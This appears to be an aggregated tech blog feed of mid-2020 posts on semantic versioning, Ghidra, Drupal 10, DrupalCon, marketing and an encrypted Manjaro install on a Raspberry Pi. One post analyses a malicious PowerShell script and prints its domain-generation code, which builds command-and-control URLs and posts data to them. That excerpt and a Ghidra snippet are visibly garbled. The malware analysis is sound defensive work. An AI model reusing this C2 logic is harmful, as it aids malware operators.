Ze zouden misschien beter hanteren voor hun versie nummers. Dat maakt het voor andere techneuten eenvoudiger om te volgen:

0.0.z wil zeggen dat het eigenlijk nog niet gereleased is, maar nog volledig in ontwikkeling ligt. Die z ophogingen zijn incrementele stappen voor de ontwikkelaars zelf.

0.y.z wil net hetzelfde zeggen. Maar de ontwikkelaars zijn begonnen met het beoefenen van versionering. Je zou ook kunnen zeggen dat iedere y ophoging betekent dat er een test is gebeurd.

1.0.0 wil zeggen dat mensen buiten het eigen ontwikkel en test-team het product in gebruik (kunnen) nemen. Dat het getest is. Dat het werkt. Dat het stabiel is.

1.0.1 wil zeggen dat er 1 enkele bugfix was op 1.0.0 en dat er enkel die bugfix in zit.

1.0.2 wil zeggen dat er 2 zulke bugfixes zijn gedaan. Nadat 1.0.1 uitgebracht was.

1.1.0 wil zeggen dat er 1 extra feature is toegevoegd aan 1.0.0.

1.1.1 wil zeggen dat er 1 extra feature is toegevoegd aan 1.0.0 en dat er in die feature een bug zat. Of dat er een oud probleem in 1.0.0 zat en dat dat hersteld is. Maar dan brengt men naast de 1.1.1 ook een 1.0.3 uit. Die 1.0.3 heeft niet die 1 extra feature van 1.1.0 maar heeft dan wel de fix die 1.1.1 heeft, gebackport voor 1.0.0 (en eigenlijk voor 1.0.2)

2.0.0 wil zeggen dat er iets gewijzigd is aan de 1.y.z reeks dat projecten die afhankelijk er van zijn kan breken. Bv. een breaking API change (of een breaking ABI). Of men heeft iets weggehaald. Er is een grote wijziging geweest.

2.0.1 wil zeggen dat er 1 bug is gefixed in 2.0.0. 2.1.0 wil zeggen 1 feature toegevoegd aan 2.0.z.

Wil je dat nu in een systeem voor versiecontrole allemaal netjes bijhouden waarbij je de wijzigingen commit per commit en branch per branch en versie per versie en auteur per auteur wil kunnen vergelijken en opvragen, voor om het even welk soort documenten, dan gebruik je gitflow.

July 16, 2020

Ghidra is a very nice disassembler developed by the NSA. When they released it, the tool became very popular amongst the security community thanks to its power and a huge list of features (that some competitors included with extra licenses – like the pseudo-code generator). Ghidra is also the default disassembler used in the SANS FOR610 training (reverse engineering and malware analysis).

The idea behind this plugin is to avoid losing time with the basic analysis of the sample and to focus on interesting code blocks. The plugin uses the Intezer’s API to collect information about the sample (it must have been submitted to the Intezer’s sandbox first). Then, the Ghidra plugin will provide you a list of functions identified as shared with other malware samples or tools.

Just browse the functions identified as “reused” and you can jump directly into the code to see what they do. This is also a great way to learn how malware behaves. In the following example, you can find a classic set of API calls to read a configuration from the resource in the PE file:

  • FindResource()
  • LoadResource()
  • LockResource()
  • SizeOfResource()

I had some issues installing the plugin on my Ubuntu 18.04-LTS VM that I use to run my Ghidra setup. So, I’d like to share some setup steps with you.

There is a problem with the Python requests module installed in Ubuntu (the official package). I had to remove the official module (2.18.4) and install an older version via PIP:

root@ubuntu:/# dpkg -r python-requests
root@ubuntu:/# pip install requests==2.7.0

(Note that you could have some dependencies with the python-requests package, be careful when removing it!)

The next step is to add the local repository of Python modules in the plugin script (

if == "posix":

Then, the plugin will work smoothly! Happy reversing!

The post Detecting Code ReUse in Ghidra With Intezer’s Plugin appeared first on /dev/random.

July 15, 2020

We are targeting to release Drupal 10 around June 2022. That is less than two years from the day of this post.
A timeline showing that Drupal 10 is targeted for June 2022 because Symfony 4 is end-of-life in November 2023.

Why June 2022, you ask?

Drupal 9's biggest dependency is Symfony 4, which has an end-of-life date in November 2023. This means that after November 2023, security bugs in Symfony 4 will not get fixed. Drupal has to adopt Symfony 5 (or later) and end-of-life Drupal 9 no later than November 2023.

For security purposes, all Drupal 9 users will need to upgrade to Drupal 10 by November 2023. We like to give site owners at least one year to upgrade from Drupal 9 to Drupal 10, therefore we are targeting Drupal 10 to be released in June 2022.

Will the upgrade to Drupal 10 be easy?

Yes, it will be easy, and here is why.

New functionality for Drupal 10 is actually added to Drupal 9 releases. This means module developers can start adopting any new APIs right away. Along the way, we deprecate old functionality but keep backwards compatibility. Once we are ready to release Drupal 10, we remove all deprecated code. Removing deprecated code breaks backwards compatibility, but because module developers had a chance to stay up to date with API changes, the upgrade to Drupal 10 should be easy.

If that makes your head spin, think of it this way: Drupal 10 is identical to the last version of Drupal 9, with its deprecations removed. Because of that, there should be no last-minute, big or unexpected changes.

We used this approach for Drupal 9, and it was successful: 95 of the top 100 contributed modules were ready the day Drupal 9.0.0 was released. We know from Drupal 9 that this approach to upgrades works, and we'll continue to refine it going forward.

July 14, 2020

DGA (“Domain Generation Algorithm“) is a technique implemented in some malware families to defeat defenders and to make the generation of IOC’s (and their usage – example to implement black lists) more difficult. When a piece of malware has to contact a C2 server, it uses domain names or IP addresses. Once the malicious code analyzed, it’s easy to build the list of domains/IP used and to ask the network team to block access to these network resources. With a DGA, the list of domain names is generated based on some criterias and the attacker has just to register the newly generated domain to move the C2 infrastructure somewhere else… This is a great cat & mouse game!

I found a malicious PowerShell script that implements a simple DGA. Here is the code:

function xfyucaesbv( $etdtyefbg ){
  $ubezabcvwd = "";
  "ge","6h","sp","FT","4H","fW","mP" | %{ $ubezabcvwd += ","+"http://"+ ( [Convert]::ToBase64String(   [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat "%y%m%V") ) ).toLower() ) +".top/"; };
  $ubezabcvwd.split(",") | %{
    if( !$myurlpost ) {
      $myurlpost = $_ -replace "=", "";
      if(!(sendpost2($etdtyefbg + "&domen=$myurlpost"))) {   
        $myurlpost = $false;
      Start-Sleep -s 5;
  if( $etdtyefbg -match "status=register" ){
    return "ok";
  } else {
    return $myurlpost;

The most interesting line is this one:

PS C:\Users\REM> "ge","6h","sp","FT","4H","fW","mP" | %{ $ubezabcvwd += ","+"http://"+ ( [Convert]::ToBase64String( [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat "%y%m%V") ) ).toLower() ) +".top/"; };

The first hostname is hardcoded but others are generated by a concatenation of one string (out of the array) with a timestamp. The string is Base64 encoded and padding is removed if present. Example:

base64("ge" + "200729") = "z2uymda3mjk="

The fact that the timestamps is based on ‘%v’ (which indicates the number of the current week (0-51) is a good indicator of a DGA. One domain will be generated every week.

I tried to resolve the domain names from the list above but none of them is registered right now. I generated domains for the next two months and I’ve added them to my hunting rules:

I’ll keep an eye on them!

The post Simple DGA Spotted in a Malicious PowerShell appeared first on /dev/random.

Today, Acquia announced the launch of its Open Digital Experience Platform, a single platform to build websites and applications, and run data-driven marketing campaigns across channels. As a part of the launch, I wrote a piece for Digiday on the impact COVID-19 is having on digital transformation. Even though many organizations are under pressure to rapidly transition their operations online, the changes they make now can have a positive impact for years to come. Below is the full text of the article.

Over the past few years, we've seen rapid innovation in many parts of the consumer world. Brands build pop-up stores overnight to test new retail, product, and marketing concepts. The same thing is happening digitally, driven by COVID-19. Businesses need to operate on compressed timelines, and "pop-up" new digital-first businesses (or as TechCrunch calls it, a flash digital transformation.)

In the past, these efforts would have taken years. This period of rapid change has certainly been difficult for many organizations. However, many of the changes organizations have made in the first half of this year will have a big impact for years to come.

One example of a brand that adapted its digital strategy due to COVID-19 is King Arthur Flour, the oldest flour company in America. The pandemic resulted in a surge of people baking at home. No longer able to rely on brick-and-mortar sales, King Arthur Flour's digital team drove demand online. They published new celebrity baking series and other creative, relevant content on their site. As a result, their sales increased 200 percent year-over-year, and website sessions spiked by 260 percent.

Other brands can be just as successful at flash transformation if they keep an eye on the three biggest trends driving it.

Trend 1: Experience wins, and requires intelligent use of data

Both a taxi and an Uber or Lyft can get you from point A to B. At the core, they are the same product. But in practice, the Uber or Lyft experience wins — at least in Boston where I live and taxis are notoriously bad.

Both Uber and Lyft rely on technology to deliver a superior customer experience. Every aspect of their customer experience is personalized, including their mobile applications, emails, text messages, safety features, and more.

For years, the promise of a personalized customer experience has remained elusive, only available to those who can make large engineering investments (like Uber or Lyft). Today, any organization can deliver great technology-driven customer experiences. Open Source has democratized the building of those. However, personalization remains hard. It requires that organizations get a handle on their customer data, which isn't an easy task and not something that is solved by Open Source.

Only when you use data to understand your customers' preferences and intentions can you deliver a truly relevant experience. In difficult economic times, relevant experiences help businesses stand out and drive much-needed sales.

Trend 2: The rise of the technical marketer

As such, marketers have become more reliant on technology to drive customer experiences. Twenty years ago, a web content management system was a stand-alone application run by IT. Today, content management is deeply integrated in the marketing technology stack and primarily operated by marketing.

It's not unusual for an ambitious website to have five or more connections into other systems. Marketing technology expert Scott Brinker counted over 8,000 marketing technology vendors in 2020, a 13.6 percent increase over 2019.

A technical marketer knows how to navigate this landscape to choose the best tools for their organization. For technical marketers, it's essential to have the right platform to integrate the tools and data sources needed to optimize their customers' experiences. The rise of that technical marketer has enabled a new relationship and partnership between marketing and IT.

Trend 3: Openness

Until recently, the idea of "open" technology was a hard sell to marketers. On the other hand, developers have embraced open APIs, Open Source, and connectors for years.

More and more, marketers find themselves road-blocked by closed systems. When a marketing automation system can't talk to other data sources, it can be impossible to implement effective personalization. When an email marketing tool only draws upon the data contained within its own system, it misses out on the data that is collected by a separate web analytics tool. Examples of these types of silos across the traditional marketing stack abound.

Without the ability to integrate different marketing tools and the data contained within them, customer experiences will continue to be disjointed and far from personal. In fact, research shows that 60 percent of customers are frustrated with brands' ability to predict their needs, and think they aren't doing an effective job of using personalization. To address these frustrations, openness and interconnectivity between technologies needs to become a marketing must-have, instead of a nice-to-have.

A new age of resilience

It's been impressive to see how resilient organizations and people have been at adapting so rapidly. This adaptation has been essential to business survival. Fortunately, the changes made under pressure could be the key to succeeding as more of the world becomes permanently digital, enabling the kinds of digital transformations that organizations have been yearning for for years.

July 12, 2020

The Raspberry PI has become more and more powerful in the recent years, maybe too powerful to be a “maker board”. The higher CPU power and availability of more memory - up to 8GB - makes it more suitable for home server usage.

The latest firmware (EEPROM) enables booting from a USB device. To enable USB boot the EEPROM on the raspberry needs to be updated to the latest version and the bootloader that comes with the operating system - the start*.elf, etc files on the boot filesystem - needs to support it.

I always try to use filesystem encryption. You’ll find my journey to install GNU/Linux on an encrypted filesystem below.

64 Bits operating systems

The Raspberry PI 4 has a 64 bits CPU, the default operating system - Raspberry Pi OS (previously called Raspbian) - for the Rasberry PI is still 32 bits to take full advantage of the 64bits CPU a 64 bits operating system is required.

You’ll find an overview GNU/Linux distributions for RPI4 below.

  • Raspberry PI OS

    Raspberry PI OS is the default operating system for the Raspberry Pi. The operating system is 32 bits.

    There is a beta version available with 64 bits support available.

  • Ubuntu

    Ubuntu for the raspberry pi has 64 bits support. But boot process isn’t fully compatible with USB boot. The bootloader isn’t up-to-date enough to support it and the u-boot loader isn’t yet updated to support USB boot.

  • Kali Linux

    Kali Linux is another 64 bits operation system for the Raspberry Pi. The bootloader isn’t updated enough to support USB boot.

  • Arch Linux ARM

    Arch Linux ARM has an install image for the Raspberry PI 4 the default install image is still 32 bits. Arch Linux ARM has 64 bits support so you could build you own image with the 64bits packages and a custom kernel.

  • Manjaro

    Manjaro is based on Arch Linux and has 64 bits support for the raspberry pi. Manjaro is a rolling distribution the boot loader is up to date enough to support USB boot.

  • Other

    The list above are the GNU/Linux distributions that I considered for my Raspberry Pi 4. There are - as always - other options. The distributions that don’t support booting from a USB device will probably support it soon.

I was looking for a GNU/Linux distribution with 64 bits support and USB boot support and went with Manjaro.

The installation process to install Manjaro on an encrypted filesystem is similar to the installation on an x84_64 system running Archlinux. See my previous blog posts: Install Arch on an encrypted btrfs partition and Install Parabola GNU/Linux on an Encrypted btrfs logical volume.

USB boot

To enable the raspberry pi 4 to boot from USB, you need to update your firmware. The boot loader also needs to be updated to enable booting from a USB device.

Get the latest firmware

Manjaro didn’t include the latest stable firmware to enable USB boot, so I used the 64 bits beta Raspberry PI OS to update the firmware.

Update Raspberry PI OS to get the latest firmware.

pi@raspberrypi:~ $ sudo apt-get update
Hit:1 buster InRelease
Hit:2 buster InRelease
Hit:3 buster/updates InRelease
Hit:4 buster-updates InRelease
Reading package lists... Done
pi@raspberrypi:~ $ sudo apt-get full-upgrade
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Calculating upgrade... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
pi@raspberrypi:~ $ 

Verify that the latest firmware is available.

The latest stable bootloader is located at /lib/firmware/raspberrypi/bootloader/stable.

pi@raspberrypi:~ $ cd /lib/firmware/raspberrypi/
pi@raspberrypi:/lib/firmware/raspberrypi $ ls
pi@raspberrypi:/lib/firmware/raspberrypi $ cd bootloader/stable/
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 

Verify that the pieeprom > 2020-06-xx is available.

pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ ls -l
total 1220
-rw-r--r-- 1 root root 524288 Apr 23 17:53 pieeprom-2020-04-16.bin
-rw-r--r-- 1 root root 524288 Jun 17 11:15 pieeprom-2020-06-15.bin
-rw-r--r-- 1 root root  98148 Jun 17 11:15 recovery.bin
-rw-r--r-- 1 root root  98904 Feb 28 15:41 vl805-000137ad.bin
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 

Get the current version

Execute vcgencmd bootloader_version to get the current firmware version.

Please note that I already updated the firmware in the output below.

pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ vcgencmd bootloader_version
Jun 15 2020 14:36:19
version c302dea096cc79f102cec12aeeb51abf392bd781 (release)
timestamp 1592228179


pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ sudo rpi-eeprom-update -d -f  ./pieeprom-2020-06-15.bin
BCM2711 detected
VL805 firmware in bootloader EEPROM
BOOTFS /boot
*** INSTALLING ./pieeprom-2020-06-15.bin  ***
BOOTFS /boot
EEPROM update pending. Please reboot to apply the update.
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 


pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ sudo reboot

Verify the version again.

pi@raspberrypi:~ $ vcgencmd bootloader_version
Jun 15 2020 14:36:19
version c302dea096cc79f102cec12aeeb51abf392bd781 (release)
timestamp 1592228179
pi@raspberrypi:~ $ 

The Raspberry PI is ready to boot from USB.

Install Manjaro on an encrypted filesystem

Manjaro will run an install script after the RPI is booted to complete the installion.

  • We have two options boot the pi from the standard non-encrypted image and extract/move it to an encrypted filesystem.
  • Extract the installation image and move the content to an encrypted filesystem.

You’ll find my journey of the second option below. The host system to extract/install the image is an x86_64 system running Archlinux.

Download and copy

Download and verify the Manjaro image from:

Copy the image to keep the original intact.

[root@vicky manjaro]# cp Manjaro-ARM-xfce-rpi4-20.06.img image

Create tarball

Verify the image

Verify the image layout with fdisk -l.

[root@vicky manjaro]# fdisk -l image
Disk image: 4.69 GiB, 5017436160 bytes, 9799680 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x090a113e

Device     Boot  Start     End Sectors   Size Id Type
image1           62500  500000  437501 213.6M  c W95 FAT32 (LBA)
image2          500001 9799679 9299679   4.4G 83 Linux
[root@vicky manjaro]# 

We’ll use kpartx to map the partitions in the image so we can mount them. kpartx is part of the multipath-tools.

Map the partitions in the image with kpartx -ax, the “-a” option add the image, “-v” makes it verbose so we can see where the partitions are mapped to.

[root@vicky manjaro]# kpartx -av image
add map loop1p1 (254:10): 0 437501 linear 7:1 62500
add map loop1p2 (254:11): 0 9299679 linear 7:1 500001
[root@vicky manjaro]#

Create the destination directory.

[root@vicky manjaro]# mkdir /mnt/chroot

Mount the partitions.

[root@vicky manjaro]# mount /dev/mapper/loop1p2 /mnt/chroot
[root@vicky manjaro]# mount /dev/mapper/loop1p1 /mnt/chroot/boot
[root@vicky manjaro]#

Create the tarball.

[root@vicky manjaro]# cd /mnt/chroot/
[root@vicky chroot]# tar czvpf /home/staf/Downloads/isos/manjaro/Manjaro-ARM-xfce-rpi4-20.06.tgz .


[root@vicky ~]# umount /mnt/chroot/boot 
[root@vicky ~]# umount /mnt/chroot
[root@vicky ~]# cd /home/staf/Downloads/isos/manjaro/
[root@vicky manjaro]# kpartx -d image
loop deleted : /dev/loop1
[root@vicky manjaro]# 

Partition and create filesystems


Partition your harddisk delete all partitions if there are partition on the harddisk.

I’ll create 3 partitions on my harddisk

  • boot partitions of 500MB (Type c ‘W95 FAT32 (LBA)’
  • root partitions of 50G
  • rest
[root@vicky ~]# fdisk /dev/sdh

Welcome to fdisk (util-linux 2.35.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.

Device does not contain a recognized partition table.
Created a new DOS disklabel with disk identifier 0x49887ce7.

Command (m for help): n
Partition type
   p   primary (0 primary, 0 extended, 4 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1): 
First sector (2048-976773167, default 2048): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-976773167, default 976773167): +500M

Created a new partition 1 of type 'Linux' and of size 500 MiB.

Command (m for help): n
Partition type
   p   primary (1 primary, 0 extended, 3 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (2-4, default 2): 2
First sector (1026048-976773167, default 1026048): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (1026048-976773167, default 976773167): +50G

Created a new partition 2 of type 'Linux' and of size 50 GiB.

Command (m for help): n
Partition type
   p   primary (2 primary, 0 extended, 2 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (3,4, default 3): 
First sector (105883648-976773167, default 105883648): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (105883648-976773167, default 976773167): 

Created a new partition 3 of type 'Linux' and of size 415.3 GiB.

Command (m for help): t
Partition number (1-3, default 3): 1
Hex code (type L to list all codes): c

Changed type of partition 'Linux' to 'W95 FAT32 (LBA)'.

The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.
Command (m for help):  

Create the boot file system

The raspberry pi uses a FAT filesystem for the boot partition.

[root@vicky ~]# mkfs.vfat /dev/sdh1
mkfs.fat 4.1 (2017-01-24)
[root@vicky ~]# 

Create the root filesystem

Overwrite the root partition with random data

Because we are creating an encrypted filesystem it’s a good idea to overwrite it with random data. We’ll use badblocks for this. Another method is to use “dd if=/dev/random of=/dev/xxx”, the “dd” method is probably the best method but is a lot slower.

[root@vicky ~]# badblocks -c 10240 -s -w -t random -v /dev/sdh2
Checking for bad blocks in read-write mode
From block 0 to 52428799
Testing with random pattern: done                                                 
Reading and comparing: done                                                 
Pass completed, 0 bad blocks found. (0/0/0 errors)
[root@vicky ~]# 

Encrypt the root filesystem


I booted the RPI4 from a sdcard to verify the encryption speed by executing the cryptsetup benchmark.

[root@minerva ~]# cryptsetup benchmark
# Tests are approximate using memory only (no storage IO).
PBKDF2-sha1       398395 iterations per second for 256-bit key
PBKDF2-sha256     641723 iterations per second for 256-bit key
PBKDF2-sha512     501231 iterations per second for 256-bit key
PBKDF2-ripemd160  330156 iterations per second for 256-bit key
PBKDF2-whirlpool  124356 iterations per second for 256-bit key
argon2i       4 iterations, 319214 memory, 4 parallel threads (CPUs) for 256-bit key (requested 2000 ms time)
argon2id      4 iterations, 321984 memory, 4 parallel threads (CPUs) for 256-bit key (requested 2000 ms time)
#     Algorithm |       Key |      Encryption |      Decryption
        aes-cbc        128b        23.8 MiB/s        77.7 MiB/s
    serpent-cbc        128b               N/A               N/A
    twofish-cbc        128b        55.8 MiB/s        56.2 MiB/s
        aes-cbc        256b        17.4 MiB/s        58.9 MiB/s
    serpent-cbc        256b               N/A               N/A
    twofish-cbc        256b        55.8 MiB/s        56.1 MiB/s
        aes-xts        256b        85.0 MiB/s        74.9 MiB/s
    serpent-xts        256b               N/A               N/A
    twofish-xts        256b        61.1 MiB/s        60.4 MiB/s
        aes-xts        512b        65.4 MiB/s        57.4 MiB/s
    serpent-xts        512b               N/A               N/A
    twofish-xts        512b        61.3 MiB/s        60.3 MiB/s
[root@minerva ~]# 
Create the Luks volume

The aes-xts cipher seems to have the best performance on the RPI4.

[root@vicky ~]# cryptsetup luksFormat --cipher aes-xts-plain64 --key-size 256 --hash sha256 --use-random /dev/sdh2

This will overwrite data on /dev/sdh2 irrevocably.

Are you sure? (Type 'yes' in capital letters): YES
Enter passphrase for /dev/sdh2: 
Verify passphrase: 
WARNING: Locking directory /run/cryptsetup is missing!
[root@vicky ~]# 
Open the Luks volume
[root@vicky ~]# cryptsetup luksOpen /dev/sdh2 cryptroot
Enter passphrase for /dev/sdh2: 
[root@vicky ~]# 

Create the root filesystem

[root@vicky ~]# mkfs.ext4 /dev/mapper/cryptroot
mke2fs 1.45.6 (20-Mar-2020)
Creating filesystem with 13103104 4k blocks and 3276800 inodes
Filesystem UUID: 557677f1-9705-4beb-8c8b-e36c552730f3
Superblock backups stored on blocks: 
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208, 
	4096000, 7962624, 11239424

Allocating group tables: done                            
Writing inode tables: done                            
Creating journal (65536 blocks): done
Writing superblocks and filesystem accounting information: done   

[root@vicky ~]# 

Mount and extract

Mount the root filesystem.

[root@vicky ~]# mount /dev/mapper/cryptroot /mnt/chroot
[root@vicky ~]# mkdir -p /mnt/chroot/boot
[root@vicky ~]# mount /dev/sdh1 /mnt/chroot/boot
[root@vicky ~]# 

And extract the tarball.

[root@vicky manjaro]# cd /home/staf/Downloads/isos/manjaro/
[root@vicky manjaro]# tar xzvf Manjaro-ARM-xfce-rpi4-20.06.tgz -C /mnt/chroot/
[root@vicky manjaro]# sync


To continue the setup we need to boot or chroot into the operating system. It possible to run ARM64 code on a x86_64 system with qemu - qemu will emulate an arm64 CPU -.

Install qemu-arm-static

Install the qemu-arm package. It not in the main Archlinux distribution but it’s available as a AUR.

[staf@vicky ~]$ yay -S qemu-arm-static 

copy qemu-arm-static

Copy the qemu-arm-static into the chroot.

[root@vicky manjaro]# cp /usr/bin/qemu-arm-static /mnt/chroot/usr/bin/
[root@vicky manjaro]# 

mount proc & co

To be able to run programs in the chroot we need the proc, sys and dev filesystems mapped into the chroot.

[root@vicky ~]# mount -t proc none /mnt/chroot/proc
[root@vicky ~]# mount -t sysfs none /mnt/chroot/sys
[root@vicky ~]# mount -o bind /dev /mnt/chroot/dev
[root@vicky ~]# mount -o bind /dev/pts /mnt/chroot/dev/pts
[root@vicky ~]# 


Chroot into ARM64 installation.

LANG=C chroot /mnt/chroot/

Set the PATH.

[root@vicky /]# export PATH=/sbin:/bin:/usr/sbin:/usr/bin

And verify that we are running aarch64.

[root@vicky /]# uname -a
Linux vicky 5.6.19.a-1-hardened #1 SMP PREEMPT Sat, 20 Jun 2020 15:16:50 +0000 aarch64 GNU/Linux
[root@vicky /]# 

Update and install vi

Update all packages to the latest version.

[root@vicky /]# pacman -Syu

We need an editor.

root@vicky /]# pacman -S vi
resolving dependencies...
looking for conflicting packages...

Packages (1) vi-1:070224-4

Total Download Size:   0.15 MiB
Total Installed Size:  0.37 MiB

:: Proceed with installation? [Y/n] y
:: Retrieving packages...
 vi-1:070224-4-aarch64                         157.4 KiB  2.56 MiB/s 00:00 [##########################################] 100%
(1/1) checking keys in keyring                                             [##########################################] 100%
(1/1) checking package integrity                                           [##########################################] 100%
(1/1) loading package files                                                [##########################################] 100%
(1/1) checking for file conflicts                                          [##########################################] 100%
(1/1) checking available disk space                                        [##########################################] 100%
:: Processing package changes...
(1/1) installing vi                                                        [##########################################] 100%
Optional dependencies for vi
    s-nail: used by the preserve command for notification
:: Running post-transaction hooks...
(1/1) Arming ConditionNeedsUpdate...
[root@vicky /]# 



Add encrypt to HOOKS before filesystems in /etc/mkinitcpio.conf.

[root@vicky /]#  vi /etc/mkinitcpio.conf
HOOKS=(base udev autodetect modconf block encrypt filesystems keyboard fsck)

Create the boot image

[root@vicky /]# ls -l /etc/mkinitcpio.d/
total 4
-rw-r--r-- 1 root root 246 Jun 11 11:06 linux-rpi4.preset
[root@vicky /]# 
[root@vicky /]# mkinitcpio -p linux-rpi4
==> Building image from preset: /etc/mkinitcpio.d/linux-rpi4.preset: 'default'
  -> -k 4.19.127-1-MANJARO-ARM -c /etc/mkinitcpio.conf -g /boot/initramfs-linux.img
==> Starting build: 4.19.127-1-MANJARO-ARM
  -> Running build hook: [base]
  -> Running build hook: [udev]
  -> Running build hook: [autodetect]
  -> Running build hook: [modconf]
  -> Running build hook: [block]
  -> Running build hook: [encrypt]
==> ERROR: module not found: `dm_integrity'
  -> Running build hook: [filesystems]
  -> Running build hook: [keyboard]
  -> Running build hook: [fsck]
==> Generating module dependencies
==> Creating gzip-compressed initcpio image: /boot/initramfs-linux.img
==> WARNING: errors were encountered during the build. The image may not be complete.
[root@vicky /]#

update boot settings…

Get the UUID for the boot and the root partition.

[root@vicky boot]# ls -l /dev/disk/by-uuid/ | grep -i sdh
lrwxrwxrwx 1 root root 12 Jul  8 11:42 xxxx-xxxx -> ../../sdh1
lrwxrwxrwx 1 root root 12 Jul  8 12:44 xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx -> ../../sdh2
[root@vicky boot]# 

The Raspberry PI uses cmdline.txt to specify the boot options.

[root@vicky ~]# cd /boot
[root@vicky boot]# 
[root@vicky boot]# cp cmdline.txt cmdline.txt_org
[root@vicky boot]# 
cryptdevice=/dev/disk/by-uuid/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx1:cryptroot root=/dev/mapper/cryptroot rw rootwait console=ttyAMA0,115200 console=t
ty1 selinux=0 plymouth.enable=0 smsc95xx.turbo_mode=N dwc_otg.lpm_enable=0 kgdboc=ttyAMA0,115200 elevator=noop snd-bcm2835.enable_compat


[root@vicky etc]# cp fstab fstab_org
[root@vicky etc]# vi fstab
[root@vicky etc]# 
# Static information about the filesystems.
# See fstab(5) for details.

# <file system> <dir> <type> <options> <dump> <pass>
UUID=xxxx-xxxx  /boot   vfat    defaults        0       0

Finish your setup

Set the root password.

[root@vicky etc]# passwd

Set the timezone.

[root@vicky etc]# ln -s /usr/share/zoneinfo/Europe/Brussels /etc/localtime

Generate the required locales.

[root@vicky etc]# vi /etc/locale.gen 
[root@vicky etc]# locale-gen

Set the hostname.

[root@vicky etc]# vi /etc/hostname

clean up

Exit chroot

[root@vicky etc]# exit
[root@vicky ~]# uname -a
Linux vicky 5.6.19.a-1-hardened #1 SMP PREEMPT Sat, 20 Jun 2020 15:16:50 +0000 x86_64 GNU/Linux
[root@vicky ~]# 

Make sure that there are no processes still running from the chroot.

[root@vicky ~]# ps aux | grep -i qemu
root      160666  0.0  0.1 323228 35468 ?        Ssl  16:50   0:00 /usr/bin/qemu-aarch64-static /usr/bin/gpg-agent --homedir /etc/pacman.d/gnupg --use-standard-socket --daemon
root      203274  0.0  0.0   6812  2188 pts/1    S+   17:14   0:00 grep -i qemu
[root@vicky ~]# 

Kill the processes from the chroot.

[root@vicky ~]# kill 160666
[root@vicky ~]# 

Umount the chroot filesystems.

[root@vicky manjaro]# mount | grep -i chroot | awk '{print $3}'
[root@vicky manjaro]# 
[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
umount: /mnt/chroot: target is busy.
umount: /mnt/chroot/dev: target is busy.
[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
umount: /mnt/chroot: target is busy.
[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
[root@vicky manjaro]# 

Close the luks volume…

[root@vicky ~]# cryptsetup luksClose cryptroot
[root@vicky ~]# sync
[root@vicky ~]# 


Connect the usb disk to the raspberry pi and power it on. If you are lucky the PI will boot from the USB device and ask you to type the password to decrypt the root filesystem.

Have fun!


July 10, 2020

I remember the first gathering of Drupal contributors back in 2005. At the time, there were less than 50 people in attendance. In the 15 years since that first gathering, DrupalCon has become the heartbeat of the Drupal community. With each new DrupalCon, we introduce new people to our community, demonstrate the best that Drupal has to offer, and reconnect with our Drupal family.

Next week's DrupalCon Global is going to be no different.

Because of COVID-19, it is the first DrupalCon that will be 100% virtual. But as much as we may miss seeing each other in person, the switch to virtual has opened opportunities to bring in speakers and attendees who never would have been able to attend otherwise.

There are a few moments I'm particularly excited about:

  • Mitchell Baker, CEO and Chair of the Mozilla Foundation, is joining us to talk about the future of the Open Web, and the importance of Open Source software.
  • Jacqueline Gibson, Digital Equity Advocate and Software Engineer from Microsoft, will be talking about Digital Inequity for the Black community – a topic I believe is deeply important for our community and the world.
  • Leaders of current Drupal strategic initiatives will be presenting their progress and their calls for action to keep Drupal the leading CMS on the web.
  • And of course, I'll be giving my keynote presentation to celebrate the community's accomplishment in releasing Drupal 9, and to talk about Drupal's future.

Beyond the sessions, I look forward to the human element of the conference. The side conversations and reunions with old friends make attending DrupalCon so much more powerful than simply watching the recordings after the fact. I hope to see you at DrupalCon Global next week!

July 09, 2020

In the last two weeks, Peter Zaitsev published a 4-part series on measuring Linux performance on this blog.

July 08, 2020

This post is the last part in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

July 07, 2020

How a broken screen kicked me out of developing an Open Source software and how the community revived it 6 years later

When I discovered the FLOSS world, at the dawn of this century, I thought developers were superheroes. Sort of semi-gods that achieved everything I wanted to do with my life like having their face displayed on, their name on the Wikipedia page describing their software or launching a free software company sold for millions. (Spoiler: I didn’t achieve the latter.) I was excited like a groupie when I could have a casual chat with Federico Mena Quintero or hang out with Michael Meeks.

I never understood why some successful developers suddenly disappeared and left their software un-maintained. I was shocked that some of them started to contribute to proprietary software. They had everything!

Without surprise, I followed that exact same path myself a few years later, without premeditation. All it took was for my laptop’s screen to break while I was giving a conference about, note the irony, Free Software.

But let’s tell things in order.

Starting a FLOSS project

